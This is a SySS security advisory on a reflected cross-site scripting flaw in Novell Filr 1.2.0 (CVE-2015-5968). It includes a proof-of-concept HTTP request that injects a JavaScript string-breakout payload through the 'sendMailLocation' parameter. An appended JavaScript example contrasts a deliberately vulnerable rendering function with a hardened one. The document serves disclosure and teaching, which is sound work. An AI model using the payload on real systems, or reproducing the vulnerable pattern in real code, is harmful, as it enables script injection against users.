-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: CVE-2015-5968
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative
file sharing [1]. High security is an important aspect of the
application.

SySS GmbH found two reflected cross-site scripting vulnerabilities in
the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH identified that it is possible to inject JavaScript code via
the parameter "sendMailLocation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send
an e-mail to a colleague.
When the following HTTP POST request is sent:

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden

an e-mail status is provided. When the button to return to the previous
page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available
in the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder".
https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
    https://www.novell.com/products/filr/
[2] SySS GmbH, SYSS-2015-055
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-055.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of the
SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
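
The value appended to "sendMailLocation" in the PoC (a double quote, a semicolon and a trailing comment marker) is the shape that terminates a JavaScript string literal early. The following is an added example, not Filr code and not part of the SySS advisory: it contrasts that reflection pattern with a validated and escaped one. That the value ends up in an inline script string is an assumption, and the host filr.example and all function names are hypothetical.

```javascript
// Added example, not Filr source code. Host, markup and names are hypothetical.
const ORIGIN = "https://filr.example";   // constructed application origin
const FALLBACK = ORIGIN + "/ssf/a/do";   // used when validation fails

// Vulnerable pattern: the parameter is concatenated into a JS string literal.
function renderBackScriptVulnerable(sendMailLocation) {
  return '<script>var backUrl = "' + sendMailLocation + '";</script>';
}

// Encode a value as a JS string literal that is safe inside an HTML <script>.
function jsStringLiteral(value) {
  return JSON.stringify(value)           // escapes quotes and backslashes
    .replace(/</g, "\\u003c")            // blocks an early </script>
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")       // line separators end JS strings
    .replace(/\u2029/g, "\\u2029");      // in older engines
}

// Accept only absolute URLs on the application's own origin.
function validateReturnUrl(raw) {
  try {
    const url = new URL(raw);
    if (url.origin !== ORIGIN) return FALLBACK; // also rejects javascript:
    return url.href;                     // normalised: '"' in query -> %22
  } catch (_) {
    return FALLBACK;                     // not a parseable absolute URL
  }
}

function renderBackScriptHardened(sendMailLocation) {
  const safe = jsStringLiteral(validateReturnUrl(sendMailLocation));
  return "<script>var backUrl = " + safe + ";</script>";
}

// Constructed input: a shortened form of the PoC value after URL decoding.
const decoded = ORIGIN +
  '/ssf/a/do?p_name=ss_forum&action=send_entry_email&novl_url=17";alert(1)//';

console.log(renderBackScriptVulnerable(decoded)); // string literal is closed early
console.log(renderBackScriptHardened(decoded));   // quote stays inside the literal
```

Validation and output encoding are applied together here: the origin check stops the parameter from pointing somewhere else, and the context-specific encoding is what prevents the breakout.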